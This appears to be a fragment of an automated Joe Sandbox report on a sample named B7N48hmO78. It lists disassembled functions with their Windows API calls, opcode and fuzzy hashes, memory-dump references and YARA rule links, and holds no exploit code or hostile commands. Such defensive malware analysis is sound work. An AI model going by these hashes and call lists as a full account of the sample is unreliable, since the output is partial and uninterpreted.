                                                                                                                  • Opcode Fuzzy Hash: 3a6d6057e48367bc82ed7424b0c5f755a41fe72a4b6c4ed71d83bbe608e3f1ee
                                                                                                                  • Instruction Fuzzy Hash: 9431D5B0504740CFC721EF36E841697BBE4FF49348F04092EF59A93241E771A948CBA2
                                                                                                                  Function 00E0395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00E03973
                                                                                                                    • Part of subcall function 00E081C2: __NMSG_WRITE.LIBCMT ref: 00E081E9
                                                                                                                    • Part of subcall function 00E081C2: __NMSG_WRITE.LIBCMT ref: 00E081F3
                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 00E0397A
                                                                                                                    • Part of subcall function 00E0821F: GetModuleFileNameW.KERNEL32(00000000,00EA0312,00000104,00000000,00000001,00000000), ref: 00E082B1
                                                                                                                    • Part of subcall function 00E0821F: ___crtMessageBoxW.LIBCMT ref: 00E0835F
                                                                                                                    • Part of subcall function 00E01145: ___crtCorExitProcess.LIBCMT ref: 00E0114B
                                                                                                                    • Part of subcall function 00E01145: ExitProcess.KERNEL32 ref: 00E01154
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  • RtlAllocateHeap.NTDLL(01070000,00000000,00000001), ref: 00E0399F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1372826849-0
                                                                                                                  • Opcode ID: c169b166a891ca78d3c19154edaaadcbc5454415d21dc9bac2ddee88eec09f9a
                                                                                                                  • Instruction ID: 5fd6f199345c098a1425fc98c6baf8df68bf1eb702017b8e2f75da74faad7249
                                                                                                                  • Opcode Fuzzy Hash: c169b166a891ca78d3c19154edaaadcbc5454415d21dc9bac2ddee88eec09f9a
                                                                                                                  • Instruction Fuzzy Hash: 6501F9313452019EE6113B79EC42A6A738C9FC6764F60202AF541FB1D6DFF0ADC046A0
                                                                                                                  Function 00E2C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E2C385,?,?,?,?,?,00000004), ref: 00E2C6F2
                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E2C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E2C708
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00E2C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E2C70F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3397143404-0
                                                                                                                  • Opcode ID: d0918eb38561f03cb2a2c15ec9013e75b28eb7d40ebf36a3b600cd371f881d59
                                                                                                                  • Instruction ID: 455fc0b3f5109739943b5a9266b603e11cf457a9776a4fda62468afc53ce2437
                                                                                                                  • Opcode Fuzzy Hash: d0918eb38561f03cb2a2c15ec9013e75b28eb7d40ebf36a3b600cd371f881d59
                                                                                                                  • Instruction Fuzzy Hash: 68E08632685224BBD7211B55FC09FCF7B18AB057A0F104110FB24790E097F125158798
                                                                                                                  Function 00E2BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00E2BB72
                                                                                                                    • Part of subcall function 00E01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E07A85), ref: 00E01CB1
                                                                                                                    • Part of subcall function 00E01C9D: GetLastError.KERNEL32(00000000,?,00E07A85), ref: 00E01CC3
                                                                                                                  • _free.LIBCMT ref: 00E2BB83
                                                                                                                  • _free.LIBCMT ref: 00E2BB95
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                                  • Instruction ID: 13c8fd1771f2fc375b6c87579e12ae7563bcf31e100771531aa17fbead144547
                                                                                                                  • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                                  • Instruction Fuzzy Hash: B3E012A164175146EA2865B97E8CEB363CC5F04355714285DB55AFB186CF24F88089A4
                                                                                                                  Function 00DE2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE22A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00DE2303
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DE25A1
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DE2618
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E5503A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 458326420-0
                                                                                                                  • Opcode ID: c628e2dd18af99839e04e100cabf59ac3e2d377b66a4ea0cdd6ce225a0ff77ca
                                                                                                                  • Instruction ID: ff786e4af57eb8eda8db5ea9d491585cd75eb0d41c552d3f2aebb9a3a95c00fe
                                                                                                                  • Opcode Fuzzy Hash: c628e2dd18af99839e04e100cabf59ac3e2d377b66a4ea0cdd6ce225a0ff77ca
                                                                                                                  • Instruction Fuzzy Hash: 7171C0B89052918E8704EF5BA891695BBE4FB9F380F8151EED119F7272DB30A40CDF24
                                                                                                                  Function 00E2BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock
                                                                                                                  • String ID: EA06
                                                                                                                  • API String ID: 2638373210-3962188686
                                                                                                                  • Opcode ID: 3660fa37a28d0d374ebdd709842dd3ecb7f4aa30af45b91a8b6f72a25813742c
                                                                                                                  • Instruction ID: bc3b40f52d4dee305f069842347399a044e9f84e74dd2e07862787371014f0b4
                                                                                                                  • Opcode Fuzzy Hash: 3660fa37a28d0d374ebdd709842dd3ecb7f4aa30af45b91a8b6f72a25813742c
                                                                                                                  • Instruction Fuzzy Hash: 4901B5729042587EDB28C7A8C856FEEBBFC9B15305F00859AF592E61C1E5B4A7088B70
                                                                                                                  Function 00DE3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • 745AC8D0.UXTHEME ref: 00DE3A73
                                                                                                                    • Part of subcall function 00E01405: __lock.LIBCMT ref: 00E0140B
                                                                                                                    • Part of subcall function 00DE3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DE3AF3
                                                                                                                    • Part of subcall function 00DE3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DE3B08
                                                                                                                    • Part of subcall function 00DE3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00DE3AA3,?), ref: 00DE3D45
                                                                                                                    • Part of subcall function 00DE3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00DE3AA3,?), ref: 00DE3D57
                                                                                                                    • Part of subcall function 00DE3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EA1148,00EA1130,?,?,?,?,00DE3AA3,?), ref: 00DE3DC8
                                                                                                                    • Part of subcall function 00DE3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00DE3AA3,?), ref: 00DE3E48
                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DE3AB3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3809921791-0
                                                                                                                  • Opcode ID: 9bc4013c058eb894f6add5cfcea9252dcfc10bfcdb18f6d911f39142daff547b
                                                                                                                  • Instruction ID: c98200df71c41af30f1fe5e8b8da7520aba7e1cfd7039c5e6a2e97253397c982
                                                                                                                  • Opcode Fuzzy Hash: 9bc4013c058eb894f6add5cfcea9252dcfc10bfcdb18f6d911f39142daff547b
                                                                                                                  • Instruction Fuzzy Hash: D91193719083419FC300EF5AEC4592ABBF4EF99750F01895FF584A72B1DB70A589CBA2
                                                                                                                  Function 00E0E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ___lock_fhandle.LIBCMT ref: 00E0EA29
                                                                                                                  • __close_nolock.LIBCMT ref: 00E0EA42
                                                                                                                    • Part of subcall function 00E07BDA: __getptd_noexit.LIBCMT ref: 00E07BDA
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1046115767-0
                                                                                                                  • Opcode ID: 702a3213e586bd6cc4dd701b13123732d2a939287debfa0212d8ba155b48c231
                                                                                                                  • Instruction ID: f128a5147fe2c76528a8ca3667bcf3e57877bc8932572213502d622229554a59
                                                                                                                  • Opcode Fuzzy Hash: 702a3213e586bd6cc4dd701b13123732d2a939287debfa0212d8ba155b48c231
                                                                                                                  • Instruction Fuzzy Hash: 5611E972A056108ED711BFA4C8413597AF16F8A331F166B50E4A03F2E2D7B49DC08AA1
                                                                                                                  Function 00E03839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __lock_file_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 26237723-0
                                                                                                                  • Opcode ID: d4b3e335c21b664ad91d21713757b5aed7bfcd6809f3a08d437e6cb1432ed58e
                                                                                                                  • Instruction ID: 1664557ef2ed5c9326a5f1e8f7584dba4b88fb66eea1060bbf3ba160dc202e3a
                                                                                                                  • Opcode Fuzzy Hash: d4b3e335c21b664ad91d21713757b5aed7bfcd6809f3a08d437e6cb1432ed58e
                                                                                                                  • Instruction Fuzzy Hash: 96018471800209EBCF26BFB4CC0259E7BA5AF40320F149259F824761E1D7318BE1DFA1
                                                                                                                  Function 00E035E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  • __lock_file.LIBCMT ref: 00E03629
                                                                                                                    • Part of subcall function 00E04E1C: __lock.LIBCMT ref: 00E04E3F
                                                                                                                  • __fclose_nolock.LIBCMT ref: 00E03634
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2800547568-0
                                                                                                                  • Opcode ID: 3a5e8af3ed926c2f890eed1ec3d6df4e7f42d7256ddb5841da60cf115364e130
                                                                                                                  • Instruction ID: 740d3f1d21c407451ad17c5c0010a814add00b4233317df886a02c54259bde49
                                                                                                                  • Opcode Fuzzy Hash: 3a5e8af3ed926c2f890eed1ec3d6df4e7f42d7256ddb5841da60cf115364e130
                                                                                                                  • Instruction Fuzzy Hash: 5DF0BB71941704AADB21BB75D80675E76E46F40334F25A109E410BB2D2CB7C87C19F55
                                                                                                                  Function 010B92D0 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 010B8B40: GetFileAttributesW.KERNELBASE(?), ref: 010B8B4B
                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000), ref: 010B9435
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesCreateDirectoryFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3401506121-0
                                                                                                                  • Opcode ID: ac33d61ed6eda326c09257e98dbb4595714a317b012aed99427ccf0b73b58385
                                                                                                                  • Instruction ID: d0e9f575868984843723c00a83dd544609ff78447125bb74d22a7939d980a638
                                                                                                                  • Opcode Fuzzy Hash: ac33d61ed6eda326c09257e98dbb4595714a317b012aed99427ccf0b73b58385
                                                                                                                  • Instruction Fuzzy Hash: 98519131A1020896EF14DFB0D894BEF737AEF58700F0085ADE60DE7290EB769A44C765
                                                                                                                  Function 00E02957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __flush.LIBCMT ref: 00E02A0B
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __flush__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4101623367-0
                                                                                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                  • Instruction ID: 14028de9a02d9721bccf98b4c65bfaa257693f0667544097487eeecac3a116be
                                                                                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                  • Instruction Fuzzy Hash: 414195317007069FDF288EA9C8885AE77F6AF84364B24A52DEA55E72C0DB70DDC18B50
                                                                                                                  Function 00DFED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction ID: 08e24a9e309b8393142c2b20b25d71efdf14661e9126bea81bbe65cf9ded1873
                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction Fuzzy Hash: B431E870A00109DBC718DF18C880979FBA6FF49340B69C6A5E549CBA66DB31EDC1DBE0
                                                                                                                  Function 00E59A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 5900bf03f1f2dd988708de428b85462c11f88879893b95fb7c93847b226927f0
                                                                                                                  • Instruction ID: b008adcd73a87f9d39303025e13a99dc8ad5153ad351ec494f2a8b25708eff59
                                                                                                                  • Opcode Fuzzy Hash: 5900bf03f1f2dd988708de428b85462c11f88879893b95fb7c93847b226927f0
                                                                                                                  • Instruction Fuzzy Hash: 43413E74504655CFEB24DF18C444B2ABBF0BF45308F1989ACEA965B762C372E845CF62
                                                                                                                  Function 00E0ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
